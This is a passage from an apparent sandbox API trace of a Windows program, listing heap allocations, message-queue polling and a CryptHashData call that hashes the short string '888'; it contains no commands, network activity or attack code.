lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0263.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0263.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0263.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0263.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0263.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0263.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0263.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0263.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0263.200] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0263.200] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0263.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x3be0048 [0263.200] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0263.200] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0263.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0263.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0263.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0263.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0263.200] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0263.200] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0263.200] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0263.200] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0263.200] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0263.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0263.200] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.200] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0263.200] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0263.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0263.200] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0263.201] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0263.201] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0263.201] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0263.201] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0263.201] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0263.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0263.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0263.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0263.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0263.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0263.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0263.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0263.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0263.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0263.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0263.201] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0263.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54fe8 [0263.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0263.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0263.201] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0263.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0263.202] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54f88, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0263.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0263.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0263.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0263.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0263.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0263.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0263.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0263.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0263.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0263.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0263.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0263.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0263.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0263.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0263.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0263.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0263.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0263.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0263.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0263.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0263.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0263.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0263.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0263.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0263.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0263.203] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0263.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977bd8 [0263.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0263.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0263.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0263.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0263.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0263.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0263.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0263.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0263.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0263.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0263.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0263.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0263.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0263.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0263.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0263.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54f88 [0263.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0263.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0263.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0263.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0263.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0263.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0263.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0263.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0263.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0263.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0263.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0263.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a88 [0263.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0263.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0263.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0263.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0263.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0263.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977bd8 | out: hHeap=0x970000) returned 1 [0263.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0263.204] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0263.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0263.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0263.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0263.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977908 [0263.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0263.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0263.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0263.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0263.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0263.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0263.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0263.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0263.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0263.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0263.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54ee8 [0263.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0263.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0263.205] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0263.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0263.205] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54f58, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0263.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0263.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0263.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0263.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0263.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0263.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0263.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e55088 [0263.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0263.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0263.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977908 | out: hHeap=0x970000) returned 1 [0263.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0263.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0263.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0263.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0263.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0263.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0263.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0263.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0263.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0263.206] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0263.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0263.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0263.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0263.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0263.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0263.207] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0263.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0263.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0263.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51ad8 [0263.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0263.207] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0263.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0263.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0263.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0263.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0263.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0263.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0263.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0263.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0263.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0263.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0263.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0263.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0263.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0263.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0263.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0263.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0263.208] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0263.208] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0263.208] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e51bc8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0263.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0263.208] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0263.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0263.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0263.209] CryptHashData (hHash=0xa870d0, pbData=0x2e54f88, dwDataLen=0x3, dwFlags=0x1) returned 1 [0263.209] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.209] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0263.209] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.209] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0263.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0263.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0263.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51da8 [0263.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0263.209] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0263.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0263.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0263.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0263.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0263.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0263.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0263.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0263.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0263.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0263.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0263.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0263.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0263.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0263.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0263.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0263.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0263.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0263.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0263.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0263.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0263.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0263.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0263.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0263.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0263.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0263.211] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0263.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0263.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0263.211] RtlAllocateHeap 